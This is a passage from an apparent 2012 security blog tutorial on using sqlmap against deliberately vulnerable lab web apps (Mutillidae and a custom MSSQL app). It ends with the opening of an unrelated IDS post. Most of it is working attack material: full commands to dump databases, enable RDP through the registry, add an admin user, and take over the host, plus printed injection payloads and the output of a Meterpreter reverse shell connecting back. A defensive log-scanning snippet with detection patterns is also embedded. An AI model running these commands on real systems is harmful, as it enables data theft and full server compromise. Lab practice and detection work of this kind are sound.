<span style="font-family: "verdana" , sans-serif;"> </span></span><br />
<span style="font-family: "verdana" , sans-serif;">KEY FEATURES>> Full support for MySQL, PostgreSQL, Oracle, MSSQL</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;">TECHNIQUES>> Boolean-based blind</span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"> Union query</span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"> Stacked (batched) queries</span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"> </span></div>
<span style="font-family: "verdana" , sans-serif;">It does extensive back-end DBMS fingerprinting and enumerates users, passwords, databases, tables, and columns.</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Disclaimer: Please do not test it on any live website without prior permission of the website owner. The author assumes no liability and is not responsible for any damage caused. I recommend hosting Mutillidae/WebGoat/DVWA on a virtual machine to practice. I have used Mutillidae to explain beginner-level exploitation (more info on Mutillidae can be found <a href="http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10" target="_blank">here</a>); for the advanced level I have used a custom-made web application designed by our team, *webmart (aspx/mssql).</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Prerequisites>> BackTrack 5 (www.backtrack-linux.org)</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Here we go!!</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">One of my favorite combinations of commands to start with!</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">a) python sqlmap.py -u "http://abc/mutillidae/index.php?page=login.php" --level=3 --forms --batch --banner --flush-session</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">This would fetch you many things: the back-end database, a banner grab, and it will also search the forms on the page and check whether any of their parameters are injectable. As shown below, the database is MySQL 5.0, the parameter username is injectable and the platform is PHP 5.3.3 on Apache 2.2.16. Woooaaa! That's a lot of info on the first run.</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "verdana" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWqTVvgErLaDacLGuFpOiRrTd1pP5YNtmWlcc0N6J6M4hVuF_W-3qhc0LQR4J_sricwMwUwgil2CiekbhlsJcAyLYVlFeCu6iWjGf54pDD871_gxrMdtqUpQAWdU9DQ0RYKayZEHr2uSA/s1600/output1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWqTVvgErLaDacLGuFpOiRrTd1pP5YNtmWlcc0N6J6M4hVuF_W-3qhc0LQR4J_sricwMwUwgil2CiekbhlsJcAyLYVlFeCu6iWjGf54pDD871_gxrMdtqUpQAWdU9DQ0RYKayZEHr2uSA/s320/output1.PNG" width="320" /></a></span></div>
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">b) python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3 --data="username=test&password=test&login-php-submit-button=Login" --flush-session --tables --dbs --batch</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Here we are providing the POST data (username=test&password=test&login-php-submit-button=Login) and telling sqlmap to enumerate all databases and tables, using the default behaviour without asking for user input (--batch). The current database user is 'root@localhost'. Here we have a lot of info to understand the back-end of the application.</span></span><br />
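Added example, not part of this post or of sqlmap: the detection side of the runs above, written in Python. It parses combined-format access log lines and flags the indicators a defender would look for, the tool's self-identifying User-Agent and payloads matching the three techniques listed above (boolean-based blind, union query, stacked queries). The log lines, IP addresses and User-Agent strings are constructed for this example.

```python
import re
from collections import defaultdict
from typing import Dict, Set
from urllib.parse import unquote_plus

# Added example (not the post's or sqlmap's code). Constructed sample access log
# lines in combined log format; the IPs, timestamps and User-Agents are made up.
SAMPLE_LOG = """\
10.0.0.7 - - [08/Oct/2012:10:01:02 +0000] "GET /mutillidae/index.php?page=login.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
10.0.0.9 - - [08/Oct/2012:10:02:15 +0000] "GET /mutillidae/index.php?page=login.php HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [08/Oct/2012:10:02:16 +0000] "POST /mutillidae/index.php?page=login.php HTTP/1.1" 200 5301 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.12 - - [08/Oct/2012:10:05:40 +0000] "GET /mutillidae/index.php?page=user-info.php&username=test%27%20AND%20%271%27%3D%271&password=x HTTP/1.1" 200 6010 "-" "Mozilla/5.0"
10.0.0.12 - - [08/Oct/2012:10:05:41 +0000] "GET /mutillidae/index.php?page=user-info.php&username=test%27%20UNION%20SELECT%20NULL%2CNULL--%20&password=x HTTP/1.1" 200 6010 "-" "Mozilla/5.0"
10.0.0.12 - - [08/Oct/2012:10:05:42 +0000] "GET /mutillidae/index.php?page=user-info.php&username=test%27%3B%20SELECT%201--%20&password=x HTTP/1.1" 200 6010 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD target PROTO", status, size, "referer", "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One rule per technique named in the post; matched against the decoded query string.
PAYLOAD_RULES = {
    "union-query": re.compile(r"\bUNION\b.{0,40}?\bSELECT\b", re.I | re.S),
    "boolean-based-blind": re.compile(r"\b(?:AND|OR)\b\s*'?\d+'?\s*=\s*'?\d+", re.I),
    "stacked-queries": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP|EXEC)\b", re.I),
}


def classify_request(target: str, user_agent: str) -> Set[str]:
    """Return the set of indicator names that fire for one request line."""
    hits: Set[str] = set()
    if "sqlmap" in user_agent.lower():
        hits.add("user-agent:sqlmap")        # the tool's default UA identifies itself
    query = target.partition("?")[2]
    decoded = unquote_plus(query)            # %27 -> ', %20 -> space, before matching
    for name, rule in PAYLOAD_RULES.items():
        if rule.search(decoded):
            hits.add(name)
    return hits


def scan_log(text: str) -> Dict[str, Set[str]]:
    """Map each client IP to the union of indicators seen across its requests."""
    findings: Dict[str, Set[str]] = defaultdict(set)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                         # malformed line: skip it, do not crash
        hits = classify_request(m["target"], m["ua"])
        if hits:
            findings[m["ip"]] |= hits
    return dict(findings)


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        print(ip, sorted(hits))
```

A --forms --level=3 run like the one above produces hundreds of such requests from one client in a few seconds, so counting flagged requests per IP per minute is the natural next step on real logs.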
<br />
<h3 style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;"><span style="font-weight: normal;">Few more ways for to dump database.</span></span></h3>
<br />
<span style="font-family: "verdana" , sans-serif;">
<span style="font-family: "verdana" , sans-serif;">python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3 --data="username=test&password=test&login-php-submit-button=Login" --flush-session --tables --dump-all -D "database to enumerate" --batch</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "verdana" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhAWZyuhIEdbJJYEWQw_tW-WN2J-v5mTe_ZIdCjmXLV6QsEIAa9nfzr4X_9hpjTghLCLEZAVKbfJVAeR3bkhxlIJL4Qzaa9FppnMNrfrw_qkOCcGTyAh3-GLT78E4e0gQ_TWAhDeQBj5s/s1600/output2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhAWZyuhIEdbJJYEWQw_tW-WN2J-v5mTe_ZIdCjmXLV6QsEIAa9nfzr4X_9hpjTghLCLEZAVKbfJVAeR3bkhxlIJL4Qzaa9FppnMNrfrw_qkOCcGTyAh3-GLT78E4e0gQ_TWAhDeQBj5s/s320/output2.PNG" width="320" /></a></span></div>
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<h3 style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;">Enumerate table Columns:</span></span></h3>
<span style="font-family: "verdana" , sans-serif;">
<span style="font-family: "verdana" , sans-serif;">python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3 --data="username=test&password=test&login-php-submit-button=Login" --flush-session -D "database to enumerate" -T "table name" --columns --batch</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Now if the column names are not common enough to enumerate then brute forcing is a better option. For a brute force check:</span></span><br />
<span style="font-family: "verdana" , sans-serif;">python sqlmap.py -u "http://abc/mutillidae/index.php" --level=3 --data="username=test&password=test&login-php-submit-button=Login" --flush-session -D "database to enumerate" -T "table name" --common-tables --common-columns --batch</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">These are some of the easy ways to do SQL injection. Now raising the bar a little high we will try exploiting a Windows system running MSSQL 2005. Here sqlmap first uploads a dynamic-linked library (DLL) used afterwards to create two user-defined functions (sys_exec() and sys_bineval()) in the database it also uses a stored procedure (xm_cmdshell) to further exploit. This is a built in stored procedure to execute commands used by MSSQL, it is enabled by default in MSSQL 2000, and for 2005 and 2008 it is disabled by default. This procedure can be also re-enabled if the current session user is a member of sysadmin role. sp_configure stored procedure can be used to re-enable it [works fine on MSSQL 2005/08]</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Here our final aim is to own the windows box hosting a webapplication (webmart) [aspx/mssql] but before that we will try doing some very awesome things with sqlmap.</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<h3 style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;">Check If remote system has RDP enabled:</span></span></h3>
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --reg-read --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --batch</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">If the output is a 0 then it is enabled if its 1 then its not. If its 1 then we can enable RDP remotely using sqlmap!</span></span><br />
<h3 style="text-align: left;">
<span style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif; font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span><span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Enabling RDP using Sqlmap:</span></span></span></h3>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">python sqlmap.py -u "http://abc/login.aspx"
--data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login --reg-add --reg-key="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" --reg-value=fDenyTSConnections --reg-type=DWORD --reg-data=0 --batch</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<h3 style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;">Create Users on the system using Operating system commands:</span></span></h3>
<span style="font-family: "verdana" , sans-serif;"> </span><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --os-cmd="net user newadmin test /add" --batch</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b> And finally to Pwn the remote system we will use (--os-pwn)</b></span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"> </span><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">python sqlmap.py -u "http://abc/login.aspx" --data="__VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&username=test&password=test&Login=Login" --os-pwn --batch</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
</span><br />
<h3 style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-weight: normal;"> Output:</span></span></h3>
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">sqlmap/1.0-dev-cc3f387 - automatic SQL injection and database takeover tool</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> http://sqlmap.org</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">[*] starting at 17:44:12</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">[17:44:13] [WARNING] you did not provide the local path where Metasploit Framework is installed</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [WARNING] sqlmap is going to look for Metasploit Framework installation into the environment paths</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] Metasploit Framework has been found installed in the '/usr/local/bin' path</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] resuming back-end DBMS 'microsoft sql server'</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] testing connection to the target url</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] sqlmap got a 302 redirect to 'http://abc:80/Errorpage.aspx'. Do you want to follow? [Y/n] Y</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">sqlmap identified the following injection points with a total of 0 HTTP(s) requests:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">---</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Place: POST</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Parameter: username</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Type: error-based</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us ername=test' AND 2076=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR(113)+CHAR(121)+CHAR(5 8)+(SELECT (CASE WHEN (2076=2076) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHA R(99)+CHAR(106)+CHAR(112)+CHAR(58))) AND 'sdFw'='sdFw&password=test&Login=Login</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> Type: UNION query</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Title: Generic UNION query (NULL) - 13 columns</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us ername=-7964' UNION ALL SELECT CHAR(58)+CHAR(114)+CHAR(113)+CHAR(121)+CHAR(58)+C HAR(73)+CHAR(121)+CHAR(81)+CHAR(121)+CHAR(109)+CHAR(103)+CHAR(90)+CHAR(89)+CHAR( 110)+CHAR(79)+CHAR(58)+CHAR(99)+CHAR(106)+CHAR(112)+CHAR(58),NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=test&Login=Login</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> Type: stacked queries</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Title: Microsoft SQL Server/Sybase stacked queries</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us ername=test'; WAITFOR DELAY '0:0:5'--&password=test&Login=Login</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> Type: AND/OR time-based blind</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Title: Microsoft SQL Server/Sybase time-based blind</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> Payload: __VIEWSTATE=/wEPDwUKMTAzMzQwOTkyOWRkVdcJb5TdgCbpISe88HswBmnhXq4=&us ername=test' WAITFOR DELAY '0:0:5'--&password=test&Login=Login</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">---</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] the back-end DBMS is Microsoft SQL Server</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">web server operating system: Windows 2003</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">back-end DBMS: Microsoft SQL Server 2005</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] how do you want to establish the tunnel?</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[1] TCP: Metasploit Framework (default)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[2] ICMP: icmpsh - ICMP tunneling</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">> 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [INFO] testing if current user is DBA</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:13] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:16] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:17] [INFO] testing if xp_cmdshell extended procedure is usable</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] heuristics detected web page charset 'ISO-8859-2'</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] the SQL query used returns 8 entries</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: " "</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: "1"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: "1"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: "1"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:44] [INFO] retrieved: "1"</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] xp_cmdshell extended procedure is usable</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] creating Metasploit Framework multi-stage shellcode</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] which connection type do you want to use?</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[1] Reverse TCP: Connect back from the database host to this machine (default)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[5] Bind TCP: Listen on the database host for a connection</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">> 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] which is the local address? [xyz] </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] which local port number do you want to use? [37597] 37597</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] which payload do you want to use?</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[1] Meterpreter (default)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[2] Shell</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[3] VNC</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">> 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:44:45] [INFO] creation in progress .................................................................... done</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:45:54] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/shellcodeexec.x32.exe'</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:45:54] [INFO] using a custom visual basic script to write the binary file content to file 'C:\Windows\Temp\shellcodeexec.x32.exe', please wait..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:46:07] [INFO] do you want confirmation that the file 'C:\Windows\Temp\shellcodeexec.x32.exe' has been successfully written on the back-end DBMS file system? [Y/n] Y</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:46:07] [INFO] the file has been successfully written and its size is 6656 bytes, same size as the local file '/pentest/database/sqlmap/extra/shellcodeexec/windows/shellcodeexec.x32.exe'</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:46:08] [INFO] running Metasploit Framework command line interface locally, please wait..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] The initial module cache will be built in the background, this can take 2-5 minutes...</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> , ,</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> / \</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ((__---,,,---__))</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> (_) O O (_)_________</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> \ _ / |\</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> o_o \ M S F | \</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> \ _____ | *</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ||| WW|||</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ||| |||</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"> =[ metasploit v4.5.0-dev [core:4.5 api:1.0]</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+ -- --=[ 939 exploits - 501 auxiliary - 151 post</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+ -- --=[ 251 payloads - 28 encoders - 8 nops</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> =[ svn r15798 updated 36 days ago (2012.08.30)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Warning: This copy of the Metasploit Framework was last updated 36 days ago.</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> We recommend that you update the framework at least every other day.</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> For information on updating your copy of Metasploit, please see:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> https://community.rapid7.com/docs/DOC-1306</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">PAYLOAD => windows/meterpreter/reverse_tcp</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">EXITFUNC => process</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">LPORT => 37597</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">LHOST => xyz</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] Started reverse handler on xyz:37597</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] Starting the payload handler...</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[17:46:49] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] Sending stage (764928 bytes) to xyz</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">[*] Meterpreter session 1 opened (xyz:37597 -> abc:4189) at 2012-10-05 17:46:57 +0530</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">meterpreter ></span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
</div>
Prajal Kulkarni (http://www.blogger.com/profile/13944936185414563638), published 2012-10-04T03:17:00.002-07:00, updated 2014-10-21T23:14:13.299-07:00
Simple steps to set up your own Prelude IDS<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana,sans-serif;">Here are some simple steps to set up your own prelude IDS. Prelude is a Universal "Security </span><br />
